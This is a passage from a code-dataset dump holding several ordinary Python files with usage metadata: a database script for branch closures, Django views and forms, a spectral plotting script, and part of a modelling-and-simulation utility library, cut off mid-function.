"usage_type": "call"}, {"api_name": "fenx.resources.icon_process.__file__", "line_number": 7, "usage_type": "attribute"}, {"api_name": "fenx.resources.icon_process", "line_number": 7, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 10, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process.convert_to_ico", "line_number": 12, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process", "line_number": 12, "usage_type": "name"}, {"api_name": "fenx.resources.icon_process.convert_to_ico", "line_number": 13, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process", "line_number": 13, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 17, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process.color_correct_hsv", "line_number": 18, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "592030549", "text": "# Modules\nimport datetime as dt\nfrom typing import List\nimport matt\n# ------------------------------------------------------------------------------------------------------------------------------------------------------\n# User Input\narguments = {\n \"BranchIds\" : {\"type\" : List[int], \"names\" : [\"i\", \"bids\", \"branchids\"], \"default\" : [], \"info\" : \"List of branches to assign surveys for.\"},\n \"ClosureDate\" : {\"type\" : dt.date, \"names\" : [\"c\", \"cl\", \"closuredate\"], \"default\" : dt.date.today(), \"info\" : \"Date at which the branches will close.\"},\n \"Logging\" : {\"type\" : bool, \"names\" : [\"l\", \"log\", \"logging\"], \"default\" : True, \"info\" : R\"Log the SQL statments executed by this script in 'E:\\Oneoffs'.\"},\n \"Autocommit\" : {\"type\" : bool, \"names\" : [\"a\", \"ac\", \"autocommit\"], \"default\" : False, \"info\" : \"Automatically commit all transactions in this script instead of requesting user permission.\"}\n}\nargs = matt.args.IOHandler(arguments=arguments, program_desc=\"Script to make new entries in the branch closures table.\")\nbranch_ids, closure_date, logging, autocommit = args[\"BranchIds\"], args[\"ClosureDate\"], args[\"Logging\"], args[\"Autocommit\"]\n# ------------------------------------------------------------------------------------------------------------------------------------------------------\n# Setup\nalch = matt.sql.Alchemy(schemas=[\"base\"])\ns, tables = alch.session, alch.reflection.classes\nClosures = tables.branch_closures\nalch.initialize_log(\"BranchClosures\", logdir=matt.lbg.one_offs_path, active=logging)\n# ------------------------------------------------------------------------------------------------------------------------------------------------------\n# Execution\nextant = [rec[0] for rec in s.query(Closures.branch_id).filter(Closures.branch_id.in_(branch_ids)).all()]\nif extant:\n raise ValueError(f\"Duplicate branch ids {[branch for branch in branch_ids if branch in extant]} not allowed.\")\n\nnew = [Closures(branch_id=branch, closure_date=closure_date, processed=None, created_date=alch.func.now(), last_modified_date=alch.func.now()) for branch in branch_ids]\nalch.insert_statement_with_safeguards(new, select_from=Closures, autocommit=autocommit)\n", "sub_path": "Scripts/Ongoing/NewBranchClosures.py", "file_name": "NewBranchClosures.py", "file_ext": "py", "file_size_in_byte": 2240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 9, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 9, "usage_type": "call"}, {"api_name": "matt.args.IOHandler", "line_number": 13, "usage_type": "call"}, {"api_name": "matt.args", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matt.sql.Alchemy", "line_number": 17, "usage_type": "call"}, {"api_name": "matt.sql", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matt.lbg", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "63687495", "text": "from django.views.generic.edit import CreateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .base import BitLinkBaseView\n\n\nclass BitLinkCreateView(BitLinkBaseView, LoginRequiredMixin, CreateView):\n template_name = 'create.html'\n fields = [\n 'original_url',\n ]\n success_url = '/mypage/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super(BitLinkCreateView, self).form_valid(form)\n\n def get_context_data(self, **kwargs):\n context = super(BitLinkCreateView, self).get_context_data(**kwargs)\n context['site_name'] = 'Create BitLink'\n return context\n", "sub_path": "wpsblog/bitly/views/create.py", "file_name": "create.py", "file_ext": "py", "file_size_in_byte": 659, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.BitLinkBaseView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "296224955", "text": "from django import forms\nfrom .models import Club\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\n\n# Form for adding a new Club\nclass ClubForm(forms.Form):\n\tname = forms.CharField(label='Club Name', max_length=64,required=True)\n\twebsite = forms.CharField(label='Website', max_length=128,required=False)\n\n\tclass Meta:\n\t\tmodel = Club\n\t\tfields = {'name' , 'email' , 'website' , 'meeting_times' , 'president' , 'treasurer' , 'icc_rep'}\n\n\tdef save(self, commit=True):\n\t\tclub = Club()\n\t\tclub.name = self.cleaned_data['name']\n\t\tclub.website = self.cleaned_data['website']\n\n\t\tif commit:\n\t\t\tclub.save()\n\n\t\treturn club\n\t\n# Form for editing the a Club that already exists\nclass EditClubForm(forms.Form):\n\tid = forms.IntegerField(required=True)\n\tname = forms.CharField(label='Club Name', max_length=64,required=True)\n\twebsite = forms.URLField(label='Website', max_length=128,required=False)\n\temail = forms.EmailField(label='Email', max_length=256,required=False)\n\tmeeting_times = forms.CharField(label='Meeting Times', max_length=256,required=False)\n\n\tclass Meta:\n\t\tmodel = Club\n\t\tfields = {'id', 'name' , 'email' , 'website' , 'meeting_times'}\n\n\tdef save(self, commit=True, user_id = None):\n\t\tclub = Club.objects.filter(id=self.cleaned_data['id'])\n\t\tif len(club) == 1:\n\t\t\tclub = club[0]\n\t\t# check if the person updating the club actually has access\n\t\tif user_id in {club.president, club.treasurer, club.icc_rep}:\n\t\t\tclub.name = self.cleaned_data['name']\n\t\t\tclub.website = self.cleaned_data['website']\n\t\t\tclub.email = self.cleaned_data['email']\n\t\t\tclub.meeting_times = self.cleaned_data['meeting_times']\n\t\n\t\t\tif commit:\n\t\t\t\tclub.save()\n\t\telse:\n\t\t\traise ValidationError(message = \"User ID \" + str(user_id) + \" doesn't have permission to edit Club ID \" + str(club.id) )\n\n\t\treturn club", "sub_path": "projectx/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.Form", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "models.Club", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Club", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.URLField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 30, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 31, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Club", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Club.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Club.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "models.Club", "line_number": 39, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "315408067", "text": "## plot_binned_radialPSD.py\r\n##=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n## DTM 10/12/2012\r\n##=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n#import modules\r\nimport sys\r\nimport numpy as np, matplotlib.pyplot as plt\r\nfrom matplotlib import rcParams\r\n\r\ndef make_plots(file_id):\r\n \r\n\r\n # Set up fonts for plots \r\n rcParams['font.family'] = 'sans-serif'\r\n rcParams['font.sans-serif'] = ['arial']\r\n rcParams['font.size'] = 8\r\n rcParams['legend.numpoints'] = 1\r\n OutputFigureFormat='png'\r\n #########################\r\n # #\r\n # READ IN THE DATA #\r\n # #\r\n #########################\r\n\r\n # open file \r\n #FileName1 = 'test_binned_radialPSD.txt'\r\n FileName1 = file_id+'_binned_radialPSD.txt'\r\n #OutputFigureName = 'radial_PSD'\r\n #OutputFigureFormat = 'eps'\r\n f1 = open(FileName1,'r') # open file\r\n lines = f1.readlines() # read in the data\r\n no_lines = len(lines) # get the number of lines (=number of data)\r\n # data variables\r\n # data variables\r\n radial_frequency_binned = np.zeros(no_lines-1) \r\n PSD_binned = np.zeros(no_lines-1) \r\n wavelength_binned = np.zeros(no_lines-1)\r\n R_sq = np.zeros(no_lines-1)\r\n Beta = np.zeros(no_lines-1) \r\n Background = np.zeros(no_lines-1) \r\n CI95 = np.zeros(no_lines-1) \r\n CI99 = np.zeros(no_lines-1) \r\n \r\n for i in range (1,no_lines-1):\r\n line = lines[i].strip().split(\" \")\r\n #print line\r\n radial_frequency_binned[i] = float(line[0])\r\n wavelength_binned[i] = float(line[1]) \r\n PSD_binned[i] = float(line[2])\r\n R_sq[i] = float(line[3])\r\n Beta[i] = float(line[4])\r\n Background[i] = float(line[5])\r\n CI95[i] = float(line[6])\r\n CI99[i] = float(line[7])\r\n f1.close()\r\n \r\n #FileName2 = 'test_radialPSD.txt'\r\n FileName2 = file_id+'_radialPSD.txt'\r\n f2 = open(FileName2,'r') # open file\r\n lines = f2.readlines() # read in the data\r\n no_lines = len(lines) # get the number of lines (=number of data)\r\n # data variables\r\n #radial_frequency = np.zeros(no_lines-1) \r\n #wavelength = np.zeros(no_lines-1)\r\n #amplitude = np.zeros(no_lines-1) \r\n #norm_amplitude = np.zeros(no_lines-1) \r\n rf = []\r\n wl = []\r\n amp = []\r\n na = []\r\n \r\n for i in range (1,no_lines-1):\r\n line = lines[i].strip().split(\" \")\r\n #print line\r\n #if( float(line[1]) > 100):\r\n rf.append(float(line[0]))\r\n wl.append(float(line[1]))\r\n amp.append(float(line[2]))\r\n na.append(float(line[3]))\r\n \r\n f2.close()\r\n \r\n radial_frequency = np.asarray(rf)\r\n wavelength = np.asarray(wl)\r\n amplitude = np.asarray(amp)\r\n norm_amplitude = np.asarray(na)\r\n \r\n\r\n\r\n rollover_freq = radial_frequency_binned[Beta==max(Beta)] \r\n #########################\r\n # #\r\n # MAKE PSD plot #\r\n # #\r\n ######################### \r\n \r\n plt.figure(1, facecolor='white',figsize=[4,8])\r\n ax1 = plt.subplot(3,1,1)\r\n ax1.axvline(x=rollover_freq,linestyle='dashed',color='black') \r\n #ax1.vlines(rollover_freq,10**-9,10**2,linestyles='dashed')\r\n ax1.plot(radial_frequency, amplitude,\".\", alpha = 0.10, markeredgewidth = 0, color = '0.0')\r\n ax1.plot(radial_frequency_binned, PSD_binned,\"o\",color='white', markeredgecolor=\"red\")\r\n ax1.plot(radial_frequency_binned, Background,\"-b\")\r\n ax1.set_yscale('log')\r\n ax1.set_xscale('log')\r\n ax1.set_xlim(xmax=0.3)\r\n ax1.grid(True)\r\n xmin,xmax = ax1.get_xlim() \r\n ax1.annotate('a', xy=(0.95,0.85), xycoords='axes fraction',backgroundcolor='white',horizontalalignment='right', verticalalignment='bottom', fontsize=rcParams['font.size']+2) \r\n ax1.set_ylabel('DFT mean-squared amplitude (m$^2$)')\r\n \r\n ax2 = plt.subplot(3,1,2)\r\n ax2.axvline(x=rollover_freq,linestyle='dashed',color='black') \r\n series1 = ax2.plot(radial_frequency_binned[Beta != -9999], R_sq[Beta != -9999],\"o\", color=\"blue\", label = 'R$^2$')\r\n ax2.set_ylabel('R$^2$')\r\n ax2.set_xscale('log')\r\n ax2.set_xlim(xmax=1)\r\n ax2.set_ylim(ymin=0.9*np.min(R_sq[Beta > 0]),ymax=1)\r\n ax2.xaxis.grid(True)\r\n ax2.annotate('b', xy=(0.95,0.85), xycoords='axes fraction',backgroundcolor='white',horizontalalignment='right', verticalalignment='bottom', fontsize=rcParams['font.size']+2) \r\n \r\n ax3 = plt.subplot(3,1,2).twinx()\r\n series2 = ax3.plot(radial_frequency_binned[Beta != -9999], Beta[Beta != -9999],\"d\",color='white', markeredgecolor=\"red\", label = 'Beta')\r\n ax3.set_ylabel('Beta')\r\n ax3.set_xscale('log')\r\n ax3.set_ylim(ymin=0.8*np.min(Beta[Beta > 0]),ymax=1.25*np.max(Beta[Beta > 0]))\r\n ax3.set_xlim(xmin,xmax)\r\n series = series1+series2\r\n labels = [l.get_label() for l in series]\r\n ax2.legend(series, labels, loc=3)\r\n \r\n \r\n ax4 = plt.subplot(3,1,3)\r\n ax4.axhspan(0, np.max(CI99), alpha = 0.2) \r\n ax4.axhspan(0, np.max(CI95), alpha = 0.2) \r\n ax4.plot(radial_frequency, norm_amplitude,\".\", alpha = 0.75, markeredgewidth = 0, color = '0.0')\r\n ax4.set_ylabel('Normalised Power')\r\n ax4.set_xlabel('Radial Frequency (m$^{-1}$)') \r\n ax4.set_xscale('log')\r\n ax4.set_xlim(xmin,xmax) \r\n ax4.grid(True)\r\n ax4.annotate('c', xy=(0.95,0.85), xycoords='axes fraction',backgroundcolor='white',horizontalalignment='right', verticalalignment='bottom', fontsize=rcParams['font.size']+2) \r\n plt.tight_layout()\r\n plt.subplots_adjust(right=0.85)\r\n #plt.show()\r\n plt.savefig(file_id+'_spectrum.' + OutputFigureFormat, format=OutputFigureFormat)\r\n \r\nif __name__ == \"__main__\":\r\n #file_id = \"/home/s1143956/LSD_Datastore/LH_paper_dems/gm_30m_dem\"\r\n make_plots(sys.argv[1])", "sub_path": "SpectralPlotting/plot_spectra_Perron_Chile.py", "file_name": "plot_spectra_Perron_Chile.py", "file_ext": "py", "file_size_in_byte": 5961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.rcParams", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 151, "usage_type": "attribute"}]} +{"seq_id": "440811799", "text": "\"\"\"\nCode from Modeling and Simulation in Python.\n\nCopyright 2020 Allen Downey\n\nMIT License: https://opensource.org/licenses/MIT\n\"\"\"\n\nimport logging\n\nlogger = logging.getLogger(name=\"modsim.py\")\n\n# make sure we have Python 3.6 or better\nimport sys\n\nif sys.version_info < (3, 6):\n logger.warning(\"modsim.py depends on Python 3.6 features.\")\n\nimport inspect\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy\n\nfrom scipy.interpolate import interp1d\nfrom scipy.interpolate import InterpolatedUnivariateSpline\n\nfrom scipy.integrate import odeint\nfrom scipy.integrate import solve_ivp\n\nfrom types import SimpleNamespace\nfrom copy import copy\n\nimport pint\n\nunits = pint.UnitRegistry()\nQuantity = units.Quantity\n\n\ndef flip(p=0.5):\n \"\"\"Flips a coin with the given probability.\n\n p: float 0-1\n\n returns: boolean (True or False)\n \"\"\"\n return np.random.random() < p\n\n\ndef cart2pol(x, y, z=None):\n \"\"\"Convert Cartesian coordinates to polar.\n\n x: number or sequence\n y: number or sequence\n z: number or sequence (optional)\n\n returns: theta, rho OR theta, rho, z\n \"\"\"\n x = np.asarray(x)\n y = np.asarray(y)\n\n rho = np.hypot(x, y)\n theta = np.arctan2(y, x)\n\n if z is None:\n return theta, rho\n else:\n return theta, rho, z\n\n\ndef pol2cart(theta, rho, z=None):\n \"\"\"Convert polar coordinates to Cartesian.\n\n theta: number or sequence in radians\n rho: number or sequence\n z: number or sequence (optional)\n\n returns: x, y OR x, y, z\n \"\"\"\n x = rho * np.cos(theta)\n y = rho * np.sin(theta)\n\n if z is None:\n return x, y\n else:\n return x, y, z\n\nfrom numpy import linspace\n\ndef linrange(start, stop, step=1, **options):\n \"\"\"Make an array of equally spaced values.\n\n start: first value\n stop: last value (might be approximate)\n step: difference between elements (should be consistent)\n\n returns: NumPy array\n \"\"\"\n n = int(round((stop-start) / step))\n return linspace(start, stop, n+1, **options)\n\n\ndef leastsq(error_func, x0, *args, **options):\n \"\"\"Find the parameters that yield the best fit for the data.\n\n `x0` can be a sequence, array, Series, or Params\n\n Positional arguments are passed along to `error_func`.\n\n Keyword arguments are passed to `scipy.optimize.leastsq`\n\n error_func: function that computes a sequence of errors\n x0: initial guess for the best parameters\n args: passed to error_func\n options: passed to leastsq\n\n :returns: Params object with best_params and ModSimSeries with details\n \"\"\"\n # override `full_output` so we get a message if something goes wrong\n options[\"full_output\"] = True\n\n # run leastsq\n t = scipy.optimize.leastsq(error_func, x0=x0, args=args, **options)\n best_params, cov_x, infodict, mesg, ier = t\n\n # pack the results into a ModSimSeries object\n details = ModSimSeries(infodict)\n details.set(cov_x=cov_x, mesg=mesg, ier=ier)\n\n # if we got a Params object, we should return a Params object\n if isinstance(x0, Params):\n best_params = Params(Series(best_params, x0.index))\n\n # return the best parameters and details\n return best_params, details\n\n\ndef minimize_scalar(min_func, bounds, *args, **options):\n \"\"\"Finds the input value that minimizes `min_func`.\n\n Wrapper for\n https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize_scalar.html\n\n min_func: computes the function to be minimized\n bounds: sequence of two values, lower and upper bounds of the range to be searched\n args: any additional positional arguments are passed to min_func\n options: any keyword arguments are passed as options to minimize_scalar\n\n returns: ModSimSeries object\n \"\"\"\n try:\n min_func(bounds[0], *args)\n except Exception as e:\n msg = \"\"\"Before running scipy.integrate.minimize_scalar, I tried\n running the function you provided with the\n lower bound, and I got the following error:\"\"\"\n logger.error(msg)\n raise (e)\n\n underride(options, xatol=1e-3)\n\n res = scipy.optimize.minimize_scalar(\n min_func,\n bracket=bounds,\n bounds=bounds,\n args=args,\n method=\"bounded\",\n options=options,\n )\n\n if not res.success:\n msg = (\n \"\"\"scipy.optimize.minimize_scalar did not succeed.\n The message it returned is %s\"\"\"\n % res.message\n )\n raise Exception(msg)\n\n return res\n\n\ndef maximize_scalar(max_func, bounds, *args, **options):\n \"\"\"Finds the input value that maximizes `max_func`.\n\n Wrapper for https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize_scalar.html\n\n min_func: computes the function to be maximized\n bounds: sequence of two values, lower and upper bounds of the\n range to be searched\n args: any additional positional arguments are passed to max_func\n options: any keyword arguments are passed as options to minimize_scalar\n\n returns: ModSimSeries object\n \"\"\"\n def min_func(*args):\n return -max_func(*args)\n\n res = minimize_scalar(min_func, bounds, *args, **options)\n\n # we have to negate the function value before returning res\n res.fun = -res.fun\n return res\n\n\ndef minimize_golden(min_func, bracket, *args, **options):\n \"\"\"Find the minimum of a function by golden section search.\n\n Based on\n https://en.wikipedia.org/wiki/Golden-section_search#Iterative_algorithm\n\n :param min_func: function to be minimized\n :param bracket: interval containing a minimum\n :param args: arguments passes to min_func\n :param options: rtol and maxiter\n\n :return: ModSimSeries\n \"\"\"\n maxiter = options.get(\"maxiter\", 100)\n rtol = options.get(\"rtol\", 1e-3)\n\n def success(**kwargs):\n return ModSimSeries(dict(success=True, **kwargs))\n\n def failure(**kwargs):\n return ModSimSeries(dict(success=False, **kwargs))\n\n a, b = bracket\n ya = min_func(a, *args)\n yb = min_func(b, *args)\n\n phi = 2 / (np.sqrt(5) - 1)\n h = b - a\n c = b - h / phi\n yc = min_func(c, *args)\n\n d = a + h / phi\n yd = min_func(d, *args)\n\n if yc > ya or yc > yb:\n return failure(message=\"The bracket is not well-formed.\")\n\n for i in range(maxiter):\n\n # check for convergence\n if abs(h / c) < rtol:\n return success(x=c, fun=yc)\n\n if yc < yd:\n b, yb = d, yd\n d, yd = c, yc\n h = b - a\n c = b - h / phi\n yc = min_func(c, *args)\n else:\n a, ya = c, yc\n c, yc = d, yd\n h = b - a\n d = a + h / phi\n yd = min_func(d, *args)\n\n # if we exited the loop, too many iterations\n return failure(root=c, message=\"maximum iterations = %d exceeded\" % maxiter)\n\n\ndef maximize_golden(max_func, bracket, *args, **options):\n \"\"\"Find the maximum of a function by golden section search.\n\n :param min_func: function to be maximized\n :param bracket: interval containing a maximum\n :param args: arguments passes to min_func\n :param options: rtol and maxiter\n\n :return: ModSimSeries\n \"\"\"\n\n def min_func(*args):\n return -max_func(*args)\n\n res = minimize_golden(min_func, bracket, *args, **options)\n\n # we have to negate the function value before returning res\n res.fun = -res.fun\n return res\n\n\ndef minimize_powell(min_func, x0, *args, **options):\n \"\"\"Finds the input value that minimizes `min_func`.\n Wrapper for https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html\n min_func: computes the function to be minimized\n x0: initial guess\n args: any additional positional arguments are passed to min_func\n options: any keyword arguments are passed as options to minimize_scalar\n returns: ModSimSeries object\n \"\"\"\n underride(options, tol=1e-3)\n\n res = scipy.optimize.minimize(min_func, x0, *args, **options)\n\n return ModSimSeries(res)\n\n\n# make aliases for minimize and maximize\nminimize = minimize_golden\nmaximize = maximize_golden\n\n\ndef run_solve_ivp(system, slope_func, **options):\n \"\"\"Computes a numerical solution to a differential equation.\n\n `system` must contain `init` with initial conditions,\n `t_0` with the start time, and `t_end` with the end time.\n\n It can contain any other parameters required by the slope function.\n\n `options` can be any legal options of `scipy.integrate.solve_ivp`\n\n system: System object\n slope_func: function that computes slopes\n\n returns: TimeFrame\n \"\"\"\n system = remove_units(system)\n\n # make sure `system` contains `init`\n if not hasattr(system, \"init\"):\n msg = \"\"\"It looks like `system` does not contain `init`\n as a system variable. `init` should be a State\n object that specifies the initial condition:\"\"\"\n raise ValueError(msg)\n\n # make sure `system` contains `t_end`\n if not hasattr(system, \"t_end\"):\n msg = \"\"\"It looks like `system` does not contain `t_end`\n as a system variable. `t_end` should be the\n final time:\"\"\"\n raise ValueError(msg)\n\n # the default value for t_0 is 0\n t_0 = getattr(system, \"t_0\", 0)\n\n # try running the slope function with the initial conditions\n try:\n slope_func(t_0, system.init, system)\n except Exception as e:\n msg = \"\"\"Before running scipy.integrate.solve_ivp, I tried\n running the slope function you provided with the\n initial conditions in `system` and `t=t_0` and I got\n the following error:\"\"\"\n logger.error(msg)\n raise (e)\n\n # get the list of event functions\n events = options.get('events', [])\n\n # if there's only one event function, put it in a list\n try:\n iter(events)\n except TypeError:\n events = [events]\n\n for event_func in events:\n # make events terminal unless otherwise specified\n if not hasattr(event_func, 'terminal'):\n event_func.terminal = True\n\n # test the event function with the initial conditions\n try:\n event_func(t_0, system.init, system)\n except Exception as e:\n msg = \"\"\"Before running scipy.integrate.solve_ivp, I tried\n running the event function you provided with the\n initial conditions in `system` and `t=t_0` and I got\n the following error:\"\"\"\n logger.error(msg)\n raise (e)\n\n # get dense output unless otherwise specified\n underride(options, dense_output=True)\n\n # run the solver\n bunch = solve_ivp(slope_func, [t_0, system.t_end], system.init,\n args=[system], **options)\n\n # separate the results from the details\n y = bunch.pop(\"y\")\n t = bunch.pop(\"t\")\n\n # get the column names from `init`, if possible\n if hasattr(system.init, 'index'):\n columns = system.init.index\n else:\n columns = range(len(system.init))\n\n # evaluate the results at equally-spaced points\n if options.get('dense_output', False):\n try:\n num = system.num\n except AttributeError:\n num = 51\n t_final = t[-1]\n t_array = linspace(t_0, t_final, num)\n y_array = bunch.sol(t_array)\n\n # pack the results into a TimeFrame\n results = TimeFrame(y_array.T, index=t_array,\n columns=columns)\n else:\n results = TimeFrame(y.T, index=t,\n columns=columns)\n\n return results, bunch\n\n\ndef check_system(system, slope_func):\n \"\"\"Make sure the system object has the fields we need for run_ode_solver.\n\n :param system:\n :param slope_func:\n :return:\n \"\"\"\n # make sure `system` contains `init`\n if not hasattr(system, \"init\"):\n msg = \"\"\"It looks like `system` does not contain `init`\n as a system variable. `init` should be a State\n object that specifies the initial condition:\"\"\"\n raise ValueError(msg)\n\n # make sure `system` contains `t_end`\n if not hasattr(system, \"t_end\"):\n msg = \"\"\"It looks like `system` does not contain `t_end`\n as a system variable. `t_end` should be the\n final time:\"\"\"\n raise ValueError(msg)\n\n # the default value for t_0 is 0\n t_0 = getattr(system, \"t_0\", 0)\n\n # get the initial conditions\n init = system.init\n\n # get t_end\n t_end = system.t_end\n\n # if dt is not specified, take 100 steps\n try:\n dt = system.dt\n except AttributeError:\n dt = t_end / 100\n\n return init, t_0, t_end, dt\n\n\ndef run_euler(system, slope_func, **options):\n \"\"\"Computes a numerical solution to a differential equation.\n\n `system` must contain `init` with initial conditions,\n `t_end` with the end time, and `dt` with the time step.\n\n `system` may contain `t_0` to override the default, 0\n\n It can contain any other parameters required by the slope function.\n\n `options` can be ...\n\n system: System object\n slope_func: function that computes slopes\n\n returns: TimeFrame\n \"\"\"\n # the default message if nothing changes\n msg = \"The solver successfully reached the end of the integration interval.\"\n\n # get parameters from system\n init, t_0, t_end, dt = check_system(system, slope_func)\n\n # make the TimeFrame\n frame = TimeFrame(columns=init.index)\n frame.row[t_0] = init\n ts = linrange(t_0, t_end, dt) * get_units(t_end)\n\n # run the solver\n for t1 in ts:\n y1 = frame.row[t1]\n slopes = slope_func(y1, t1, system)\n y2 = [y + slope * dt for y, slope in zip(y1, slopes)]\n t2 = t1 + dt\n frame.row[t2] = y2\n\n details = ModSimSeries(dict(message=\"Success\"))\n return frame, details\n\n\ndef run_ralston(system, slope_func, **options):\n \"\"\"Computes a numerical solution to a differential equation.\n\n `system` must contain `init` with initial conditions,\n and `t_end` with the end time.\n\n `system` may contain `t_0` to override the default, 0\n\n It can contain any other parameters required by the slope function.\n\n `options` can be ...\n\n system: System object\n 